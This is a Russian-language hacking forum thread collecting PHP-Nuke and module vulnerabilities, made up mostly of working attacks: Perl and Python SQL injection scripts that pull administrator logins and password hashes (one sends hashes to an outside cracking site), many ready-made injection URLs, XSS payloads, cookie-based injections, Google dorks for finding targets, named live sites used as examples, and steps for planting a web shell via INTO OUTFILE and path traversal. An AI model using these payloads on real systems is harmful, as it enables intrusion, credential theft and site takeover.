[ Обзор уязвимостей PHP-Nuke ]

Discussion in 'Веб-уязвимости' started by [53x]Shadow, 19 Jan 2008.

  1. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    XSS in PHP-Nuke (eWeather module)

    XSS

    Vulnerable: eWeather module

    Уязвимый код: в скрипте /modules/eWeather/index.php
    PHP:
    Строка 35$zipCode=$chart
    Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
    Переменная "chart" не фильтруется.

    PoC:
    Code:
    http://example.net/modules.php?name=eWeather&chart=[XSS]
    
    Fix:

    Строку 35 заменить на: "$zipCode=(int)$chart;"

    by: NetJackal
     
    #21 iddqd, 14 Mar 2008
    Last edited: 14 Mar 2008
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection

    SQL Injection

    Vulnerable: PHP-Nuke Platinum 7.6.b.5

    Vuln script: dynamic_titles.php

    Exploit:
    Code:
    #!/usr/bin/perl
    #Inphex
    use LWP::UserAgent;
    use LWP::Simple;
    use IO::Socket;
    use Switch;
    #PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
    #nuke_users Structure:
    #user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
    #Description:
    #The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
    #What about PHP-Nukes' SQL Injection Protection?
    #I could bypass its SQL Injection protection.
    #If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
    #You can of course edit the SQL Injection , file write is possible.
    #
    #Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
    print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
    $column = "username";
    $table  = "nuke_users";
    $uid    = 2;
    %cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");
    
    $a = 0;
    foreach  (@ARGV) {
    	$a++;
    	while (($k, $v) = each(%cm_n_)) {
    		if ($_ eq $k) {
    			${$v} = $ARGV[$a];
    		}
    	}
    }
    &getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
    sub getit($$)
    {
    	$url = shift;
    	$reg = shift;
    
    
    	$ua = LWP::UserAgent->new;
        $urls = $url;
        $response = $ua->get($urls);
        $content = $response->content;
    
    	if ($content=~m/$reg/) {
    	    ($f,$s,$l) = split(">>",$1);
    	    $s =~s/ Post //;
    	    print $column.":".$s."\n";
    	}
    }
    
    © Inphex
     
  3. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    PHP-Nuke version 8.1 CAPTCHA bypass

    Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy.

    http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip
     
  4. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability

    PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
    Code:
    -------------------------------------------------------------------------------
    php-nuke modules EasyContent remote sql inj
    -------------------------------------------------------------------------------
    found =xoron
    -------------------------------------------------------------------------------
    modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
    modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
    -------------------------------------------------------------------------------
    Example: http://eurowards.org/content/
    
    not: password and username in title! colomb number 1
    
    not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma.
    işe yarar bug nasıl hit yapıyor görmek istiyorsanız
    
    http://www.milw0rm.com/author/721
    
    sadece bi bug 16000+  hit sadece milw0rm;)
    
    Herzmn kral benimdir!
    -------------------------------------------------------------------------------
     
  5. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PHP-Nuke GaestebuchSQL Injection Exploit
    Code:
    #!/usr/bin/python 
    # PHP-Nuke Gaestebuch Module SQL Injection Exploit 
    # Coded By Shahin Ramezany For Fun 
    # E-Mail : Admin@secuiran.com 
     
    import string 
    import urllib 
    import sys 
    import re 
     
    def Secuiran(): 
            print "\n" 
            print "#####################################################" 
            print "#                WwW.Secuiran.Com                   #" 
            print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #" 
            print "#  Coded By Shahin . Ramezany (Vampire) For Fun     #" 
            print "# Keep It Priv8 && Never Post In Public Forum's     #" 
            print "#          E-Mail : Admin@Secuiran.com            #" 
            print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #" 
            print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #" 
            print "#####################################################" 
            print "\n" 
     
     
     
     
    #Call Banner 
    Secuiran() 
     
    print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/" 
    try: 
            host=raw_input("\nTarget Host (with http) : ") 
    except KeyboardInterrupt: 
            print "\n[-] Program Terminated" 
            sys.exit() 
     
    print "\n[+] Output File: e.e: secuiran.txt" 
     
    try: 
            secuiran=raw_input("\nOutput File: ") 
    except KeyboardInterrupt: 
            print "\n[-] Program Terminated" 
            sys.exit() 
     
    print "\n[+] Trying  To Connect ...\n" 
     
    #SQL Injection URL 
    sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1" 
     
    response = urllib.urlopen(sql_inject).read() 
     
    print "[+] Trying  To Inject Code ...\n" 
    #Extract Admin User 
     
    findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall 
    found_users=findall_users(response) 
     
    #check found user length 
    if len(found_users)==0: 
        print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " 
        sys.exit() 
     
    #Extract Admin Hash 
    response = urllib.urlopen(sql_inject).read() 
    findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall 
    found_hashs=findall_hashs(response) 
    if len(found_hashs)==0: 
        print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " 
        sys.exit() 
     
     
    #Crack The Hash 
    md5 = string.join( found_hashs, '' ) 
    print "[+] Trying To Crack The Hash ..." 
    crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5 
    result = urllib.urlopen(crack).read() 
    cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall 
    if re.match(result,"MD5_1_result,"+md5+" - not found"): 
       print "[-] Can Not Crack" 
       #sys.exit() 
     
    found=cracked(result) 
    #Convert List To String 
    cracked_md5 = string.join( found, '' ) 
     
    #Print All Info 
    Secuiran() 
    print "\n[+] Host : ",host 
    for i in range(len(found_users)): 
            print "\n[+] Admin User :  ",found_users[i] 
            print "\n[+] Admin Hash :  ",found_hashs[i] 
    if (cracked_md5 == "not"): 
            print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!" 
    else: 
            print "\n[+] Hash Cracked Successfully : ",cracked_md5 
     
    #Save All Info In File 
    file = open(secuiran, "w") 
    file.write("**************************************************WwW.Secuiran.Com**************************************************\n") 
    file.write("\n") 
    file.write("HOST :") 
    file.write("       ") 
    file.write(host) 
    file.write("\n") 
    file.write("\n") 
    file.write("USER                        HASH\n") 
    file.write("            ") 
    file.write("\n") 
    for i in range(len(found_users)): 
        file.write(found_users[i]) 
        file.write("                         ") 
        file.write(found_hashs[i]) 
        file.write("\n") 
    file.write("\n") 
    if (cracked_md5 == "not"): 
            file.write("\n") 
            file.write("I Can't Crack Your Hash") 
    else: 
            file.write("Cracked :") 
            file.write("            ") 
            file.write("\n") 
            file.write(cracked_md5) 
            file.write("\n") 
            file.write("**************************************************WwW.Secuiran.Com**************************************************\n") 
    file.close() 
    print "\n[+] Successfully, Writed To ",secuiran," File ." 
     
  6. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab

    Code:
    #!/usr/bin/python
    #===============================================================================
    ==================#
    #                                    This is a Priv8 Exploit.                                     #
    #                                  Date: 23/02/2008 [dd,mm,yyyy]                                  #
    #                                                                                                 #
    #===============================================================================
    ==================#
    #                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
    #                                    Response Analisys Method                                     #
    #                                                                                                 #
    #                                       Vendor:   http://www.phpnuke.org                          #
    #                                     Severity:   Highest                                         #
    #                                       Author:   The:Paradox                                     #
    #===============================================================================
    ==================#                                                                                                
    #              Server configuration requirments:                                                  #
    #                magic_quotes_gpc = 0                                                             #  
    #===============================================================================
    ==================#                                                                                                
    #                                       Proud To Be Italian.                                      #
    #===============================================================================
    ==================#
    """                                                                                              
                                               Related Codes:
                       mainfile.php; line 89;
    
    if (!ini_get('register_globals')) {
      @import_request_variables("GPC", "");
    }
                 /Your_Account/index.php; line 1700;
    switch($op) {
    //   [..]
      case "activate":
      activate($username, $check_num);
      break;
    //   [..]  
      }
                                     /Your_Account/index.php; line 161:
    
    function activate($username, $check_num) {
      global $db, $user_prefix, $module_name, $language, $prefix;
      $username = filter($username, "nohtml", 1);
      $past = time()-86400;
      $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
      $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
      echo $sql;  
      $result = $db->sql_query($sql);
    
    """
    #===============================================================================
    ==================#
    # Proof Of Concept / Bug Explanation:                                                             #
    #                                                                                                 #
    # I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
    # Byte null bypasses all query string check.                                                      #
    #                                                                                                 #
    #===============================================================================
    ==================#
    # Google Dork=> Powered by PHPNuke                                                        #
    #===============================================================================
    ==================#
    # Use this at your own risk. You are responsible for your own deeds.                              #
    #===============================================================================
    ==================#
    #                                      Python Exploit Starts                                      #
    #===============================================================================
    ==================#
    import httplib, sys, time
    print "\n#=========================================================#"
    print "             PHPNuke <= 8.0 And Maybe Higher             "
    print "          Blind Sql Injection Vulnerability Mq=0         "
    print "                Response Analisys Method                 "
    print "                                                         "
    print "                Discovered By The:Paradox                "        
    print "                                                         "
    print " Usage:                                                  "
    print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
    print "                                                         "  
    print " Example:                                                "        
    print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
    print " python %s www.host.com / Andrea                         " % (sys.argv[0])  
    print "                                                         "  
    print "                                                         "    
    print "#=========================================================#\n"
    if len(sys.argv)<=3:   sys.exit()
    else:   print "[.]Exploit Starting."
    
    
    target = sys.argv[1]
    path = sys.argv[2]
    
    
    prefix = "nuke_"
    port = "80"
    
    
    j=1
    h4sh = ""
    md5tuple = []
    
    for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
    for k in range(97,103): md5tuple.append(k)
    md5tuple.append('END')
    
    # Result query >>>
    #
    # SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'  
    #
    
    print "[.]Blind Sql Injection Starts.\n\nHash:"
    while j <= 32:
      for i in md5tuple:
         if i == 'END':   sys.exit('[-]Exploit Failed.\n')
    
         conn = httplib.HTTPConnection(target,port)
         conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
    
         response = conn.getresponse()
    
         time.sleep(0.5)    
         if response.status == 404: sys.exit('[-]Error 404. Not Found.')    
         if response.read().find("New user verification number is invalid.") != -1:
            sys.stdout.write(chr(i))
            sys.stdout.flush()
            h4sh += chr(i)
            j += 1
            break;
    
    print "\n\n[+]All Done.\n-=Paradoxe=-"
     
  7. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    594
    Reputations:
    567
    Ковырял я когда то PHP Nuke 8.0. Вот парачка багов:

    [XSS]
    http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00"><script>alert()</script>


    [XSS]
    http://nuke/modules.php?name=Your_Account&op=logout
    POST: redirect=1%00"><script>alert()</script>


    [SQL-Inj] (POC)
    http://nuke/admin.php
    POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
     
    3 people like this.
  8. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
  9. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    XSS:
    POST-запрос на странице http://site/modules.php?name=Your_Account &op=new_user
    Code:
    "><script src=http://site/script.js>
    В полях: gfx_check та random_num.
     
  10. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян

    Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код

    Exploit:

    Для примера возьму сайт sat-port.info
    Регистрируемся, редактируем наш аккаунт:
    Code:
    http://sat-port.info/modules.php?name=Your_Account&op=edituser
    в поле Любой Email пишем:
    Code:
    admin@admin.ru',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*
    Берем любую новость где разрешено оставлять комментарии, к примеру эту:
    Code:
    http://sat-port.info/modules.php?name=News&file=article&sid=554
    жмем "Комментировать" и пишем комментарий любого содержания, в результате появиться комментарий содержащий логин:хэш администратора
     
    #30 l-l00K, 31 Aug 2008
    Last edited: 31 Aug 2008
    3 people like this.
  11. login999

    login999 Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    491
    Likes Received:
    280
    Reputations:
    92
    myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability

    Code:
    ############################################################
    
    SQL Injection vulnerability in myPHPNuke
    
    By MustLive (http://websecurity.com.ua)
    
    Detailed information: http://websecurity.com.ua/2398/
    
    Description: There is SQL Injection vulnerability in printfeature.php in
    myPHPNuke.
    
    SQL Injection:
    
    http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
    
    With this query you will receive login and password (hash) of administrator.
    
    Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
    additional filters were added, so it is not vulnerable to this attack. But
    version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
    Injection attack is possible (without using spaces and brackets).
    
    ############################################################
    
    # milw0rm.com [2008-09-02]
    
    Содрано с milw0rm.com/exploits/6347
     
  12. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0

    Code:
    modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors
    
    и еще

    Code:
    modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors--
    modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+nuke_authors--
    
     
    #32 bons, 6 Sep 2008
    Last edited: 11 Sep 2008
  13. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    SQL-Injection PHP-Nuke <= 8.0

    SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

    /modules/Reviews/index.php
    Фрагмент уязвимого кода:
    PHP:
    $uname filter($cookie[1], "nohtml");
        
    $id intval($id);
        
    $score intval($score);
        if (
    is_user($user)) {
            
    $krow $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
            if (
    $krow['karma'] == 2) {
                
    $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
                include(
    "header.php");
                
    title(""._MODERATEDTITLE."");
                
    OpenTable();
                echo 
    "<center>"._COMMENTMODERATED."";
                echo 
    "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
                
    CloseTable();
                include(
    "footer.php");
                die();
            } elseif (
    $krow['karma'] == 3) {
                
    Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
                die();
            }
        }
        
    $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
    Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter
    PHP:
    function filter($what$strip=""$save=""$type="") {
        if (
    $strip == "nohtml") {
            
    $what check_html($what$strip);
    //        $what = htmlentities(trim($what), ENT_QUOTES);
            // If the variable $what doesn't comes from a preview screen should be converted
            
    if ($type != "preview" AND $save != 1) {
                
    $what html_entity_decode($whatENT_QUOTES);
            }
        }
        if (
    $save == 1) {
            
    $what check_words($what);
            
    $what check_html($what$strip);
            if (!
    get_magic_quotes_gpc()) {
            
    $what addslashes($what);
    }
        } else {
            
    $what stripslashes(FixQuotes($what,$strip));
            
    $what check_words($what);
            
    $what check_html($what$strip);
        }
        return(
    $what);
    }
    а оттуда в ф-цию check_html
    PHP:
    function check_html ($str$strip="") {
        
    /* The core of this code has been lifted from phpslash */
        /* which is licenced under the GPL. */
        
    include("config.php");
        if (
    $strip == "nohtml")
        
    $AllowableHTML=array('');
        
    $str stripslashes($str);
        
    $str eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>'$str);
        
    // Delete all spaces from html tags .
        
    $str eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">'$str);
        
    // Delete all attribs from Anchor, except an href, double quoted.
        
    $str eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>"''$str);
        
    // Delete all img tags
        
    $str eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>"''$str);
        
    // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
        
    $tmp "";
        while (
    ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
            
    $i strpos($str,$reg[0]);
            
    $l strlen($reg[0]);
            if (
    $reg[1][0] == "/"$tag strtolower(substr($reg[1],1));
            else 
    $tag strtolower($reg[1]);
            if (
    $a $AllowableHTML[$tag])
            if (
    $reg[1][0] == "/"$tag "</$tag>";
            elseif ((
    $a == 1) || ($reg[2] == "")) $tag "<$tag>";
            else {
                
    # Place here the double quote fix function.
                
    $attrb_list=delQuotes($reg[2]);
                
    // A VER
                //$attrb_list = ereg_replace("&","&amp;",$attrb_list);
                
    $tag "<$tag$attrb_list ">";
            } 
    # Attribs in tag allowed
            
    else $tag "";
            
    $tmp .= substr($str,0,$i) . $tag;
            
    $str substr($str,$i+$l);
        }
        
    $str $tmp $str;
        return 
    $str;
        exit;
        
    /* Squash PHP tags unconditionally */
        
    $str ereg_replace("<\?","",$str);
        return 
    $str;
    }
    где экранирующие бэкслэши успешно удаляются, поэтому становится возможным внедрить наш sql код, через скулю в select данные вывести не получится, поэтому юзаем скулю в insert
    Идем в
    /modules.php?name=Reviews&rop=showcontent&id=1
    выбираем любую рецензию, жмем "Поместить комментарий"
    в куки кидаем
    Code:
    base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
    Жмем submit, в результате мы получим login:hash админа

    Зато через скулю в select при file_priv можно залить шелл, кидаем в куки:
    Code:
    base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
    Тут путь можно не раскрывать, лить в tmp, а затем просто проинклудить залитый шелл через templetes, для этого идем в /modules.php?name=Your_Account&op=chgtheme
    правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем:
    Code:
    <option value="/../../../../../../../tmp/" >RusNuke2003
    сохраняем, получаем шелл
     
    15 people like this.
  14. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Уязвимости модулей PHP-NUKE

    Уязвимый продукт: PHP-NUKE module Pages
    Версия: 1.0
    Дорк: Pages © inurl:/modules.php?name=Pages

    SQL-injections

    Уязвимость в файле: index.php

    В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры

    Code:
    /modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23
    /modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11,12+from+nuke_authors%23
    /modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_authors%23
    /modules.php?name=Pages&cid=11'%0aunion+select+1%23
    /modules.php?name=Pages&pid=11'%0aunion+select%201,2%23
     
    #34 l-l00K, 14 Dec 2008
    Last edited: 14 Dec 2008
    4 people like this.
  15. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Уязвимый продукт: PHP-NUKE module video stream
    Версия: 4.53
    Дорк: inurl:name=Video_Stream

    SQL-injections


    Уязвимость в файле: watch.php
    PHP:
    $id $_GET['id'];
    $request $_GET['request'];

    if(
    $id == "request") {
        
    // Gets the data of request video **FOR ADMIN**
        
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");
        
    $row $db->sql_fetchrow($result);
    } else {
        
    // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered
        
    adultcategory($id);
        
    // Add user point for veiwing video
        
    userpointsVS(1);
        
    // adds a view to the video
        
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
        
    $row $db->sql_fetchrow($result);
        
    $v $row['views'];
        
    $v++;
        
    $result $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");
        
    // Gets the data of that video
        
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
        
    $row $db->sql_fetchrow($result);    
    }
    Как видим здесь присутствуют сразу несколько sql-inj
    Примеры запросов:
    Code:
    /modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
    /modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
    Уязвимость в файле: broken.php
    PHP:
        if($_POST['Submit']) {
            
    OpenTable();
            
    $usernameb $_POST['username'];
            
    $user_emailb $_POST['user_email'];
            
    $result $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");
    Пример запроса:
    Code:
    POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 90
    username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1),1)/*&user_email=ad%40a.ru&Submit=Submit
    Уязвимость в файле: search.php
    В этом модуле присуствуют сразу несколько sql-inj

    Примеры запросов:
    1. /phpnuke/modules.php?name=Video_Stream&page=search
    в поле search:
    Code:
    44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*
    2.
    Code:
    POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 138
    PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort
    Уязвимость в файле: comment.php
    PHP:
    $commenttopost $_POST['comment'];
                    
    // Check if no comment
                    
    if($commenttopost == "") {
                        die(
    ""._NOCOMMENTENT."");
                    }
                    
    $date date("h:i A dS M Y");
        
                    
    $username $looker;
        
                    
    // Strips out HTML and Censored Words
                    
    filter_text($commenttopost'nohtml');
                    
    // **********************************
                    
    userpointsVS(2);
                    
    $result $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");
    в куки кидаем:
    Code:
    id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*
    В результате получим комментарий содержащий aid:hash администратора
     
    1 person likes this.
  16. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Уязвимый продукт: PHP-NUKE module auktion
    Версия: 2.0
    Дорк: inurl:modules.php?name=auktion

    SQL-injections

    В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах

    Примеры запросов:
    Code:
    /modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21
    /modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23
    /modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*
    /modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
    
    Code:
    POST /modules.php?name=auktion&file=edititem HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3
    Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1YTMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D; 
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 105
    name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*
     
    2 people like this.
  17. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
